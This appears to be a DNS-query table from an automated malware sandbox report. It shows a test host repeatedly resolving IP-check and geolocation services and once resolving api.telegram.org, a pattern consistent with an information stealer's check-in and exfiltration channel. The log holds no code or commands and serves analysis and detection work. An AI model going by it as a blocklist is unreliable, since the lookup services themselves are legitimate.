                                              Jul 26, 2024 23:45:36.774833918 CEST8.8.8.8192.168.2.220xa5e4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:37.871150017 CEST8.8.8.8192.168.2.220xa29aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:37.871150017 CEST8.8.8.8192.168.2.220xa29aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.771265030 CEST8.8.8.8192.168.2.220xbb4cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.771265030 CEST8.8.8.8192.168.2.220xbb4cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.771265030 CEST8.8.8.8192.168.2.220xbb4cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.771265030 CEST8.8.8.8192.168.2.220xbb4cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.771265030 CEST8.8.8.8192.168.2.220xbb4cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.771265030 CEST8.8.8.8192.168.2.220xbb4cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.842966080 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.842966080 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.842966080 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.842966080 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.842966080 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.842966080 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.863590002 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.863590002 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.863590002 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.863590002 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.863590002 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.863590002 CEST8.8.8.8192.168.2.220xc49No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:40.735959053 CEST8.8.8.8192.168.2.220x3cadNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:40.735959053 CEST8.8.8.8192.168.2.220x3cadNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401194096 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401194096 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401194096 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401194096 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401194096 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401194096 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.407588005 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.407588005 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.407588005 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.407588005 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.407588005 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.407588005 CEST8.8.8.8192.168.2.220x8630No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.419262886 CEST8.8.8.8192.168.2.220xc693No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.419262886 CEST8.8.8.8192.168.2.220xc693No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.419262886 CEST8.8.8.8192.168.2.220xc693No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.419262886 CEST8.8.8.8192.168.2.220xc693No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.419262886 CEST8.8.8.8192.168.2.220xc693No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.419262886 CEST8.8.8.8192.168.2.220xc693No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.535531044 CEST8.8.8.8192.168.2.220xafa5No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.535531044 CEST8.8.8.8192.168.2.220xafa5No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.542736053 CEST8.8.8.8192.168.2.220xafa5No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.542736053 CEST8.8.8.8192.168.2.220xafa5No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.186707020 CEST8.8.8.8192.168.2.220xfa66No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.186707020 CEST8.8.8.8192.168.2.220xfa66No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.257505894 CEST8.8.8.8192.168.2.220xfa66No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.257505894 CEST8.8.8.8192.168.2.220xfa66No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.486668110 CEST8.8.8.8192.168.2.220x6749No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.486668110 CEST8.8.8.8192.168.2.220x6749No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.486668110 CEST8.8.8.8192.168.2.220x6749No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.486668110 CEST8.8.8.8192.168.2.220x6749No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.486668110 CEST8.8.8.8192.168.2.220x6749No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.486668110 CEST8.8.8.8192.168.2.220x6749No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.532221079 CEST8.8.8.8192.168.2.220xc764No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.532221079 CEST8.8.8.8192.168.2.220xc764No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.532221079 CEST8.8.8.8192.168.2.220xc764No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.532221079 CEST8.8.8.8192.168.2.220xc764No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.532221079 CEST8.8.8.8192.168.2.220xc764No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.532221079 CEST8.8.8.8192.168.2.220xc764No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.540035009 CEST8.8.8.8192.168.2.220xf05dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.540035009 CEST8.8.8.8192.168.2.220xf05dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.540035009 CEST8.8.8.8192.168.2.220xf05dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.540035009 CEST8.8.8.8192.168.2.220xf05dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.540035009 CEST8.8.8.8192.168.2.220xf05dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.540035009 CEST8.8.8.8192.168.2.220xf05dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.543221951 CEST8.8.8.8192.168.2.220x916No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.543221951 CEST8.8.8.8192.168.2.220x916No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.543221951 CEST8.8.8.8192.168.2.220x916No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.543221951 CEST8.8.8.8192.168.2.220x916No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.543221951 CEST8.8.8.8192.168.2.220x916No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.543221951 CEST8.8.8.8192.168.2.220x916No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:43.339736938 CEST8.8.8.8192.168.2.220x49fbNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:43.339736938 CEST8.8.8.8192.168.2.220x49fbNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.136018991 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.136018991 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.136018991 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.136018991 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.136018991 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.136018991 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.328207016 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.328207016 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.328207016 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.328207016 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.328207016 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.328207016 CEST8.8.8.8192.168.2.220x2302No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.412067890 CEST8.8.8.8192.168.2.220x68beNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.412067890 CEST8.8.8.8192.168.2.220x68beNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.412067890 CEST8.8.8.8192.168.2.220x68beNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.412067890 CEST8.8.8.8192.168.2.220x68beNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.412067890 CEST8.8.8.8192.168.2.220x68beNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.412067890 CEST8.8.8.8192.168.2.220x68beNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.418123960 CEST8.8.8.8192.168.2.220x6dc6No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.418123960 CEST8.8.8.8192.168.2.220x6dc6No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.075834036 CEST8.8.8.8192.168.2.220x2ef7No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.075834036 CEST8.8.8.8192.168.2.220x2ef7No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.164971113 CEST8.8.8.8192.168.2.220xc927No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.164971113 CEST8.8.8.8192.168.2.220xc927No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.164971113 CEST8.8.8.8192.168.2.220xc927No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.164971113 CEST8.8.8.8192.168.2.220xc927No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.164971113 CEST8.8.8.8192.168.2.220xc927No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.164971113 CEST8.8.8.8192.168.2.220xc927No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.173413992 CEST8.8.8.8192.168.2.220xd5c4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.173413992 CEST8.8.8.8192.168.2.220xd5c4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.173413992 CEST8.8.8.8192.168.2.220xd5c4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.173413992 CEST8.8.8.8192.168.2.220xd5c4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.173413992 CEST8.8.8.8192.168.2.220xd5c4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.173413992 CEST8.8.8.8192.168.2.220xd5c4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.697089911 CEST8.8.8.8192.168.2.220x473aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.697089911 CEST8.8.8.8192.168.2.220x473aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.697089911 CEST8.8.8.8192.168.2.220x473aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.697089911 CEST8.8.8.8192.168.2.220x473aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.697089911 CEST8.8.8.8192.168.2.220x473aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.697089911 CEST8.8.8.8192.168.2.220x473aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.706389904 CEST8.8.8.8192.168.2.220x29feNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.706389904 CEST8.8.8.8192.168.2.220x29feNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.706389904 CEST8.8.8.8192.168.2.220x29feNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.706389904 CEST8.8.8.8192.168.2.220x29feNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.706389904 CEST8.8.8.8192.168.2.220x29feNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.706389904 CEST8.8.8.8192.168.2.220x29feNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:46.560062885 CEST8.8.8.8192.168.2.220xdd21No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:46.560062885 CEST8.8.8.8192.168.2.220xdd21No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:46.887716055 CEST8.8.8.8192.168.2.220x9609No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:46.887716055 CEST8.8.8.8192.168.2.220x9609No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:46.894819975 CEST8.8.8.8192.168.2.220x9609No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:46.894819975 CEST8.8.8.8192.168.2.220x9609No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.247642994 CEST8.8.8.8192.168.2.220x104aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.507905006 CEST8.8.8.8192.168.2.220xcbffNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.507905006 CEST8.8.8.8192.168.2.220xcbffNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.507905006 CEST8.8.8.8192.168.2.220xcbffNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.507905006 CEST8.8.8.8192.168.2.220xcbffNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.507905006 CEST8.8.8.8192.168.2.220xcbffNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.507905006 CEST8.8.8.8192.168.2.220xcbffNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.518174887 CEST8.8.8.8192.168.2.220x1edcNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.518174887 CEST8.8.8.8192.168.2.220x1edcNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.518174887 CEST8.8.8.8192.168.2.220x1edcNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.518174887 CEST8.8.8.8192.168.2.220x1edcNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.518174887 CEST8.8.8.8192.168.2.220x1edcNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.518174887 CEST8.8.8.8192.168.2.220x1edcNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.018521070 CEST8.8.8.8192.168.2.220x7bf8No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.018521070 CEST8.8.8.8192.168.2.220x7bf8No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.689132929 CEST8.8.8.8192.168.2.220x844aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.689132929 CEST8.8.8.8192.168.2.220x844aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.689132929 CEST8.8.8.8192.168.2.220x844aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.689132929 CEST8.8.8.8192.168.2.220x844aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.689132929 CEST8.8.8.8192.168.2.220x844aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.689132929 CEST8.8.8.8192.168.2.220x844aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.697443008 CEST8.8.8.8192.168.2.220xaf79No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.697443008 CEST8.8.8.8192.168.2.220xaf79No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.697443008 CEST8.8.8.8192.168.2.220xaf79No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.697443008 CEST8.8.8.8192.168.2.220xaf79No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.697443008 CEST8.8.8.8192.168.2.220xaf79No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.697443008 CEST8.8.8.8192.168.2.220xaf79No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:49.391303062 CEST8.8.8.8192.168.2.220x92bdNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:49.391303062 CEST8.8.8.8192.168.2.220x92bdNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.057598114 CEST8.8.8.8192.168.2.220x2dabNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.057598114 CEST8.8.8.8192.168.2.220x2dabNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.057598114 CEST8.8.8.8192.168.2.220x2dabNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.057598114 CEST8.8.8.8192.168.2.220x2dabNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.057598114 CEST8.8.8.8192.168.2.220x2dabNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.057598114 CEST8.8.8.8192.168.2.220x2dabNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.065959930 CEST8.8.8.8192.168.2.220xe0deNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.065959930 CEST8.8.8.8192.168.2.220xe0deNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.065959930 CEST8.8.8.8192.168.2.220xe0deNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.065959930 CEST8.8.8.8192.168.2.220xe0deNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.065959930 CEST8.8.8.8192.168.2.220xe0deNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.065959930 CEST8.8.8.8192.168.2.220xe0deNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:51.699316978 CEST8.8.8.8192.168.2.220x5c7fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:51.699316978 CEST8.8.8.8192.168.2.220x5c7fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.384382010 CEST8.8.8.8192.168.2.220x7b1eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.384382010 CEST8.8.8.8192.168.2.220x7b1eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.384382010 CEST8.8.8.8192.168.2.220x7b1eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.384382010 CEST8.8.8.8192.168.2.220x7b1eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.384382010 CEST8.8.8.8192.168.2.220x7b1eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.384382010 CEST8.8.8.8192.168.2.220x7b1eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.393100023 CEST8.8.8.8192.168.2.220xe4aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.393100023 CEST8.8.8.8192.168.2.220xe4aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.393100023 CEST8.8.8.8192.168.2.220xe4aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
